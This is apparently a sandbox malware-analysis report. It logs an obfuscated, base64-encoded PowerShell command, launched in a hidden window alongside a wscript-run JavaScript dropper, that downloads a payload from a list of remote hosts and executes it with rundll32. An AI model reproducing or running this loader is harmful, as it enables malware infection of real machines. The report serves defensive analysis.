dgBBAEcAMABBAGEAUQBCAHoAQQBIAE0AQQBZAFEAQgB0AEEASABBAEEAYgBBAEIAbABBAEcAUQBBAEwAZwBCADUAQQBHADgAQQBhAHcAQgB2AEEARwBnAEEAWQBRAEIAdABBAEcARQBBACIAOwAkAHIAYQBqAGUAcwBoACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBRAEEANQBBAEMANABBAE0AZwBBAHcAQQBEAFkAQQBMAGcAQQB4AEEARABZAEEATQB3AEEAdQBBAEQAawBBAE0AdwBBAD0APQB1AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdQBBAEcAOABBAGIAZwBCAHUAQQBHAFUAQQBjAGcAQgAyAEEARwA4AEEAZABRAEIAegBBAEcAdwBBAGUAUQBCAFEAQQBIAEkAQQBaAFEAQgBrAEEARwBrAEEAZABnAEIAcABBAEcANABBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEASABRAEEAYQBRAEIAbABBAEcANABBAFoAQQBCAGgAQQBBAD0APQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABhAGUAYwBpAGQAaQB1AG0ALgBBAHQAdABlAG4AdQBhAHQAbwByACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgA2ADUANAAwADUAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBHAEUAQQBaAFEAQgBqAEEARwBrAEEAWgBBAEIAcABBAEgAVQBBAGIAUQBBAHUAQQBFAEUAQQBkAEEAQgAwAEEARwBVAEEAYgBnAEIAMQBBAEcARQBBAGQAQQBCAHYAQQBIAEkAQQBMAEEAQgAyAEEARwBrAEEAYwBBAEIAegBBAEQAcwBBAGMAdwBCAHMAQQBHAEUAQQBZAHcAQgByAEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBACIAOwAkAEUAYQBzAHQAZQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBoAEEARwB3AEEAYgBBAEIAaABBAEcAMABBAGIAdwBCADAAQQBIAFEAQQBhAFEAQQB1AEEARwBNAEEAYwBnAEIAbABBAEcAUQBBAGEAUQBCADAAQQBBAD0APQBrAHIAVABFAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAagBBAEcAOABBAGMAZwBCAHkAQQBIAFUAQQBjAEEAQgAwAEEARwB3AEEAWgBRAEIAegBBAEgATQBBAEwAZwBCAGgAQQBIAFUAQQBZAHcAQgAwAEEARwBrAEEAYgB3AEIAdQBBAEEAPQA9AGsAcgBUAEUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABVAEEAYgBnAEIAagBBAEcAOABBAGQAUQBCAHUAQQBIAE0AQQBaAFEAQgBzAEEARwBFAEEAWQBnAEIAcwBBAEcAVQBBAEwAZwBCAHkAQQBHAFUAQQBhAFEAQgB6AEEARwBVAEEAawByAFQARQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEUAQQBHAGsAQQBjAHcAQgBsAEEARwA0AEEAZABBAEIAeQBBAEcARQBBAFkAdwBCAGwAQQBHAFEAQQBMAGcAQgBoAEEARwB3AEEAYwB3AEIAaABBAEcATQBBAFoAUQBBAD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAJABTAGEAbgBzAGEAcgBUAGEAcgByAHkAaQBuAGcAbAB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEAegBBAEMANABBAE0AUQBBAHoAQQBEAFEAQQBMAGcAQQB4AEEARABjAEEATgBBAEEAdQBBAEQASQBBAE4AQQBBADQAQQBBAD0APQBVAEIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAxAEEARABZAEEATABnAEEAeABBAEQAUQBBAE4AdwBBAHUAQQBEAEUAQQBOAEEAQQAwAEEAQwA0AEEATQBRAEEAegBBAEQARQBBAFUAQgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBNAFEAQQB6AEEAQwA0AEEATQBnAEEAeABBAEQAVQBBAEwAZwBBAHgAQQBEAEkAQQBNAFEAQQB1AEEARABFAEEATQBRAEEAMwBBAEEAPQA9AFUAQgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAEEAQQB1AEEARABJAEEATQBnAEEAeQBBAEMANABBAE0AZwBBAHgAQQBEAGcAQQBMAGcAQQB5AEEARABFAEEATgB3AEEAPQAiADsAJABNAGkAeAB0AGkAbABpAG4AZQBhAHIARQBuAGQAYQBuAGcAZQBpAHQAaQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBjAEEAYwBnAEIAaABBAEgAawBBAGEAUQBCAHUAQQBHAGMAQQBRAHcAQgAxAEEARwB3AEEAYgBRAEIAbABBAEcAUQBBAEwAZwBCAHoAQQBIAFUAQQBjAEEAQgB3AEEARwA4AEEAYwBnAEIAMABBAEEAPQA9AGMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA1AEEARABBAEEATABnAEEAMABBAEQAVQBBAEwAZwBBAHgAQQBEAEkAQQBOAEEAQQB1AEEARABjAEEATgB3AEEAPQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAUQBBAGUAUQBCAHcAQQBHAFUAQQBaAGcAQgB2AEEASABJAEEAYgBRAEEAdQBBAEcASQBBAFkAUQBCAHkAQQBHAGMAQQBZAFEAQgBwAEEARwA0AEEAYwB3AEEAPQAiADsAfQB9ACQAcwB3AGUAZQB0AGkAZQB3AGkAZgBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBHAEEARwBFAEEAYgBBAEIAegBBAEcAawBBAFoAZwBCAHAAQQBHAFUAQQBjAGcAQQB1AEEASABBAEEAYQBBAEIAdgBBAEgAUQBBAGIAdwBCAHoAQQBBAD0APQAiADsA"

cmdline

powershell -encodedcommand "JABjAGEAcABzAGkAYwB1AG0AcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAGcAQQAwAEEARABFAEEATABnAEEAeABBAEQAYwBBAE8AUQBBAHUAQQBEAEkAQQBNAGcAQQAzAEEAQQA9AD0AbgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBNAGcAQQAzAEEAQwA0AEEATgB3AEEAegBBAEMANABBAE4AdwBBAHcAQQBDADQAQQBPAEEAQQAwAEEAQQA9AD0AbgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAEkAQQBMAGcAQQB5AEEARABFAEEATgBnAEEAdQBBAEQARQBBAE4AQQBBADEAQQBDADQAQQBNAFEAQQA1AEEARABjAEEAIgA7ACQAVAB1AGIAZgBpAHMAaABlAHMAUwBsAHUAbQBwAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAYwBBAGMAZwBCAGgAQQBHADQAQQBkAFEAQgBzAEEARwA4AEEAWQB3AEIANQBBAEgAUQBBAGIAdwBCAHcAQQBHADgAQQBhAFEAQgBsAEEASABNAEEAYQBRAEIAegBBAEMANABBAFoAUQBCAHUAQQBIAFEAQQBaAFEAQgB5AEEASABBAEEAYwBnAEIAcABBAEgATQBBAFoAUQBCAHoAQQBBAD0APQBGAE8AdwBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYASQBBAFoAUQBCAHAAQQBHADQAQQBkAEEAQgBsAEEASABJAEEAWgBnAEIAbABBAEgASQBBAFoAUQBCAHUAQQBHAE0AQQBaAFEAQgBRAEEASABJAEEAYgB3AEIAdwBBAEcAOABBAFoAQQBCAHAAQQBHAEUAQQBiAEEAQgBsAEEAQwA0AEEAWgBBAEIAbABBAEEAPQA9ACIAOwAkAEwAbwB3AGIAcgBlAGQARAB5AHMAawBpAG4AZQBzAGkAYQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAUQBBAGMAZwBCAHYAQQBHAHcAQQBiAEEAQgBsAEEASABrAEEAWQBnAEIAMQBBAEgATQBBAEwAZwBCAGoAQQBHAEUAQQBjAHcAQgBvAEEAQQA9AD0ATgBvAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AZwBBAHcAQQBEAFUAQQBMAGcAQQA1AEEARABNAEEATABnAEEAeABBAEQAQQBBAE8AUQBBAD0ATgBvAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABRAEEATQB3AEEAdQBBAEQARQBBAE8AQQBBADUAQQBDADQAQQBOAEEAQQA1AEEAQwA0AEEATQBnAEEAegBBAEQASQBBAE4AbwBMAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAbwBBAGIAdwBCADUAQQBIAGMAQQBaAFEAQgBsAEEARwBRAEEATABnAEIAMABBAEcAOABBAGQAdwBCAHUAQQBBAD0APQAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAyADsAJABVAG4AdABhAHgAaQBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAE0AQQBHAGsAQQBiAGcAQgBuAEEARwBFAEEAYgBBAEIAaABBAEMANABBAGQAZwBCAGoAQQBBAD0APQBZAGwAcQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEkAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMgBBAEMANABBAE8AQQBBADUAQQBDADQAQQBNAFEAQQB3AEEARABJAEEAWQBsAHEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAwAEEARwBFAEEAYgBBAEIAdgBBAEcATQBBAFkAUQBCAHMAQQBHAE0AQQBZAFEAQgB1AEEARwBVAEEAWQBRAEIAdQBBAEMANABBAGQAZwBCAHYAQQBIAGsAQQBZAFEAQgBuAEEARwBVAEEAWQBsAHEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBBAEEAMABBAEMANABBAE0AZwBBAHcAQQBEAEUAQQBMAGcAQQAyAEEARABZAEEATABnAEEAMgBBAEQASQBBACIAOwAkAFAAcgBpAG0AaQB0AGkAYQBlAFMAYwByAHUAdABvACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA1AEEARABnAEEATABnAEEAeQBBAEQARQBBAE0AZwBBAHYAQQBIAE0AQQBNAEEAQgBCAEEAQwA4AEEATgBnAEEAMgBBAEQAUQBBAGIAdwBBADIAQQBIAEUAQQBkAGcAQgBqAEEARwBVAEEAYQBnAEEAPQBTAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAQQBBAE8AUQBBAHUAQQBEAEUAQQBOAHcAQQB5AEEAQwA0AEEATgBBAEEAMQBBAEMANABBAE4AdwBBADUAQQBDADgAQQBVAEEAQgBzAEEARQB3AEEATgBBAEIAdABBAEYAVQBBAEwAdwBCAHAAQQBIAEUAQQBSAHcAQgBNAEEARABjAEEAUwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATQBnAEEAMABBAEMANABBAE0AUQBBADUAQQBEAGcAQQBMAGcAQQB5AEEARABFAEEATQB3AEEAdgBBAEUAWQBBAGMAdwBBADQAQQBGAEEAQQBlAFEAQQB2AEEARwB3AEEAVQBBAEIASwBBAEcAbwBBAFIAZwBBADMAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABTAGwAYQB2AG8AYwByAGEAdABpAGMAQwBvAG4AZgBlAHMAcwBlAHMAIABpAG4AIAAkAFAAcgBpAG0AaQB0AGkAYQBlAFMAYwByAHUAdABvACAALQBzAHAAbABpAHQAIAAiAFMAIgApACAAewAkAEYAbAB1AHMAaABpAG4AZwBsAHkARQBwAGkAegBvAGEAcgBpAGEAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIASABBAEcAOABBAFoAQQBCAG0AQQBIAFUAQQBiAEEAQgBFAEEARwBVAEEAYwBBAEIAbABBAEcANABBAFoAQQBCAGgAQQBHADQAQQBkAEEAQgBzAEEASABrAEEATABnAEIAegBBAEcAZwBBAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABJAEEATQBnAEEAdQBBAEQAawBBAE8AUQBBAHUAQQBEAEUAQQBOAHcAQQB5AEEAQwA0AEEATQBRAEEAdwBBAEQAUQBBAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwA4AEEAWQBnAEIAcwBBAEcAawBBAGQAQQBCAGwAQQBIAEkAQQBZAFEAQgAwAEEARwBrAEEAYgB3AEIAdQBBAEgATQBBAFYAUQBCADIAQQBHAEUAQQBjAGcAQgB2AEEASABZAEEAYQBRAEIAMABBAEcAVQBBAEwAZwBCAGoAQQBIAEkAQQBaAFEAQgBrAEEARwBrAEEAZABBAEIAagBBAEcARQBBAGMAZwBCAGsAQQBBAD0APQAiADsAdAByAHkAIAB7ACQATABvAG8AZgBhAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBNAFEAQQB1AEEARABFAEEATQBBAEEAMwBBAEMANABBAE0AUQBBADMAQQBEAGMAQQBMAGcAQQAxAEEARABNAEEAVgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFUAQQBiAGcAQgBrAEEARwBVAEEAYwBnAEIAegBBAEgAQQBBAGIAQQBCAHAAQQBHAE0AQQBhAFEAQgB1AEEARwBjAEEATABnAEIAegBBAEcARQBBAFYAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABBAEEATABnAEEAMABBAEQAUQBBAEwAZwBBAHgAQQBEAGsAQQBOAFEAQQB1AEEARABFAEEATQBRAEEAMgBBAEEAPQA9AFYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBFAEEAYgBBAEIAcwBBAEcAOABBAGQAQQBCAHkAQQBHADgAQQBjAEEAQgBsAEEASABNAEEATABnAEIAbABBAEcAMABBAFkAUQBCAHAAQQBHAHcAQQAiADsAJABLAGUAZQBuAGkAbgBnAFQAaABlAG8AcABoAGEAZwB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBFAEEARwBFAEEAYgBBAEIAagBBAEcARQBBAGMAdwBCAHoAQQBHAGsAQQBZAFEAQgB1AEEARgBVAEEAYgBnAEIAegBBAEcAVQBBAGIAZwBCAHoAQQBHAGsAQQBZAGcAQgBwAEEARwB3AEEAYQBRAEIAMABBAEgAawBBAEwAZwBCAHoAQQBHAFUAQQBlAEEAQgA1AEEAQQA9AD0ASQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAFEAQQBhAFEAQgAyAEEARwBVAEEAYwBnAEIAbgBBAEcAVQBBAGIAZwBCAGoAQQBHAFUAQQBjAHcAQgBCAEEARwB3AEEAWQBRAEIAeQBBAEcAMABBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEASABjAEEAWgBRAEIAaQBBAEgATQBBAGEAUQBCADAAQQBHAFUAQQBJAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGEAQQBCAHYAQQBIAFEAQQBiAHcAQgB1AEEARwBVAEEAWgB3AEIAaABBAEgAUQBBAGEAUQBCADIAQQBHAFUAQQBMAGcAQgB6AEEARwA4AEEAYgBBAEIAaABBAEgASQBBAEkAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBpAEEARwBFAEEAYgBBAEIAaABBAEcANABBAGIAdwBCAHcAQQBHAGcAQQBiAHcAQgB5AEEARwBrAEEAYgBnAEEAdQBBAEgAYwBBAGEAUQBCAHIAQQBHAGsAQQAiADsAJABvAHUAdABjAG8AbQBlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFMAbABhAHYAbwBjAHIAYQB0AGkAYwBDAG8AbgBmAGUAcwBzAGUAcwApACkAOwB3AGcAZQB0ACAAJABvAHUAdABjAG8AbQBlACAALQBPACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGEAZQBjAGkAZABpAHUAbQAuAEEAdAB0AGUAbgB1AGEAdABvAHIAOwAkAGYAaQBnAGUAYQB0AGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE0AdwBBAHUAQQBEAGcAQQBOAFEAQQB1AEEARABFAEEATwBBAEEAMgBBAEMANABBAE0AUQBBAHgAQQBEAEkAQQAiADsAJABWAGUAcgBuAGEAbABpAHQAeQBNAGkAYwByAG8AcABoAG8AbgBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEEAQQBNAEEAQQB1AEEARABFAEEATwBRAEEAeQBBAEMANABBAE0AUQBBADUAQQBEAFEAQQBMAGcAQQAyAEEARABBAEEAbwBaAFQAawBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAHcAQQBZAFEAQgB3AEEARwBJAEEAYgB3AEIAaABBAEgASQBBAFoAQQBCAEUAQQBHADgAQQBkAHcAQgB1AEEARwBZAEEAWQBRAEIAagBBAEcAVQBBAEwAZwBCAHoAQQBHAFUAQQBvAFoAVABrAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAMABBAGEAUQBCAHoAQQBIAE0AQQBZAFEAQgB0AEEASABBAEEAYgBBAEIAbABBAEcAUQBBAEwAZwBCADUAQQBHADgAQQBhAHcAQgB2AEEARwBnAEEAWQBRAEIAdABBAEcARQBBACIAOwAkAHIAYQBqAGUAcwBoACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBRAEEANQBBAEMANABBAE0AZwBBAHcAQQBEAFkAQQBMAGcAQQB4AEEARABZAEEATQB3AEEAdQBBAEQAawBBAE0AdwBBAD0APQB1AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdQBBAEcAOABBAGIAZwBCAHUAQQBHAFUAQQBjAGcAQgAyAEEARwA4AEEAZABRAEIAegBBAEcAdwBBAGUAUQBCAFEAQQBIAEkAQQBaAFEAQgBrAEEARwBrAEEAZABnAEIAcABBAEcANABBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEASABRAEEAYQBRAEIAbABBAEcANABBAFoAQQBCAGgAQQBBAD0APQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABhAGUAYwBpAGQAaQB1AG0ALgBBAHQAdABlAG4AdQBhAHQAbwByACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgA2ADUANAAwADUAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBHAEUAQQBaAFEAQgBqAEEARwBrAEEAWgBBAEIAcABBAEgAVQBBAGIAUQBBAHUAQQBFAEUAQQBkAEEAQgAwAEEARwBVAEEAYgBnAEIAMQBBAEcARQBBAGQAQQBCAHYAQQBIAEkAQQBMAEEAQgAyAEEARwBrAEEAYwBBAEIAegBBAEQAcwBBAGMAdwBCAHMAQQBHAEUAQQBZAHcAQgByAEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBACIAOwAkAEUAYQBzAHQAZQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBoAEEARwB3AEEAYgBBAEIAaABBAEcAMABBAGIAdwBCADAAQQBIAFEAQQBhAFEAQQB1AEEARwBNAEEAYwBnAEIAbABBAEcAUQBBAGEAUQBCADAAQQBBAD0APQBrAHIAVABFAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAagBBAEcAOABBAGMAZwBCAHkAQQBIAFUAQQBjAEEAQgAwAEEARwB3AEEAWgBRAEIAegBBAEgATQBBAEwAZwBCAGgAQQBIAFUAQQBZAHcAQgAwAEEARwBrAEEAYgB3AEIAdQBBAEEAPQA9AGsAcgBUAEUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABVAEEAYgBnAEIAagBBAEcAOABBAGQAUQBCAHUAQQBIAE0AQQBaAFEAQgBzAEEARwBFAEEAWQBnAEIAcwBBAEcAVQBBAEwAZwBCAHkAQQBHAFUAQQBhAFEAQgB6AEEARwBVAEEAawByAFQARQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEUAQQBHAGsAQQBjAHcAQgBsAEEARwA0AEEAZABBAEIAeQBBAEcARQBBAFkAdwBCAGwAQQBHAFEAQQBMAGcAQgBoAEEARwB3AEEAYwB3AEIAaABBAEcATQBBAFoAUQBBAD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAJABTAGEAbgBzAGEAcgBUAGEAcgByAHkAaQBuAGcAbAB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEAegBBAEMANABBAE0AUQBBAHoAQQBEAFEAQQBMAGcAQQB4AEEARABjAEEATgBBAEEAdQBBAEQASQBBAE4AQQBBADQAQQBBAD0APQBVAEIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAxAEEARABZAEEATABnAEEAeABBAEQAUQBBAE4AdwBBAHUAQQBEAEUAQQBOAEEAQQAwAEEAQwA0AEEATQBRAEEAegBBAEQARQBBAFUAQgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBNAFEAQQB6AEEAQwA0AEEATQBnAEEAeABBAEQAVQBBAEwAZwBBAHgAQQBEAEkAQQBNAFEAQQB1AEEARABFAEEATQBRAEEAMwBBAEEAPQA9AFUAQgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAEEAQQB1AEEARABJAEEATQBnAEEAeQBBAEMANABBAE0AZwBBAHgAQQBEAGcAQQBMAGcAQQB5AEEARABFAEEATgB3AEEAPQAiADsAJABNAGkAeAB0AGkAbABpAG4AZQBhAHIARQBuAGQAYQBuAGcAZQBpAHQAaQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBjAEEAYwBnAEIAaABBAEgAawBBAGEAUQBCAHUAQQBHAGMAQQBRAHcAQgAxAEEARwB3AEEAYgBRAEIAbABBAEcAUQBBAEwAZwBCAHoAQQBIAFUAQQBjAEEAQgB3AEEARwA4AEEAYwBnAEIAMABBAEEAPQA9AGMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA1AEEARABBAEEATABnAEEAMABBAEQAVQBBAEwAZwBBAHgAQQBEAEkAQQBOAEEAQQB1AEEARABjAEEATgB3AEEAPQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAUQBBAGUAUQBCAHcAQQBHAFUAQQBaAGcAQgB2AEEASABJAEEAYgBRAEEAdQBBAEcASQBBAFkAUQBCAHkAQQBHAGMAQQBZAFEAQgBwAEEARwA0AEEAYwB3AEEAPQAiADsAfQB9ACQAcwB3AGUAZQB0AGkAZQB3AGkAZgBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBHAEEARwBFAEEAYgBBAEIAegBBAEcAawBBAFoAZwBCAHAAQQBHAFUAQQBjAGcAQQB1AEEASABBAEEAYQBBAEIAdgBBAEgAUQBBAGIAdwBCAHoAQQBBAD0APQAiADsA"

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW May 23, 2023, 9:37 a.m.	show_type: 0 filepath_r: wscript parameters: "C:\ProgramData\dedicative.js" Trochees Superscript melanthiumSarcoderma stitchedWhangam filepath: wscript	1	1	0
ShellExecuteExW May 23, 2023, 9:37 a.m.	show_type: 0 filepath_r: powershell parameters: -encodedcommand "JABjAGEAcABzAGkAYwB1AG0AcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAGcAQQAwAEEARABFAEEATABnAEEAeABBAEQAYwBBAE8AUQBBAHUAQQBEAEkAQQBNAGcAQQAzAEEAQQA9AD0AbgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBNAGcAQQAzAEEAQwA0AEEATgB3AEEAegBBAEMANABBAE4AdwBBAHcAQQBDADQAQQBPAEEAQQAwAEEAQQA9AD0AbgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAEkAQQBMAGcAQQB5AEEARABFAEEATgBnAEEAdQBBAEQARQBBAE4AQQBBADEAQQBDADQAQQBNAFEAQQA1AEEARABjAEEAIgA7ACQAVAB1AGIAZgBpAHMAaABlAHMAUwBsAHUAbQBwAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAYwBBAGMAZwBCAGgAQQBHADQAQQBkAFEAQgBzAEEARwA4AEEAWQB3AEIANQBBAEgAUQBBAGIAdwBCAHcAQQBHADgAQQBhAFEAQgBsAEEASABNAEEAYQBRAEIAegBBAEMANABBAFoAUQBCAHUAQQBIAFEAQQBaAFEAQgB5AEEASABBAEEAYwBnAEIAcABBAEgATQBBAFoAUQBCAHoAQQBBAD0APQBGAE8AdwBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYASQBBAFoAUQBCAHAAQQBHADQAQQBkAEEAQgBsAEEASABJAEEAWgBnAEIAbABBAEgASQBBAFoAUQBCAHUAQQBHAE0AQQBaAFEAQgBRAEEASABJAEEAYgB3AEIAdwBBAEcAOABBAFoAQ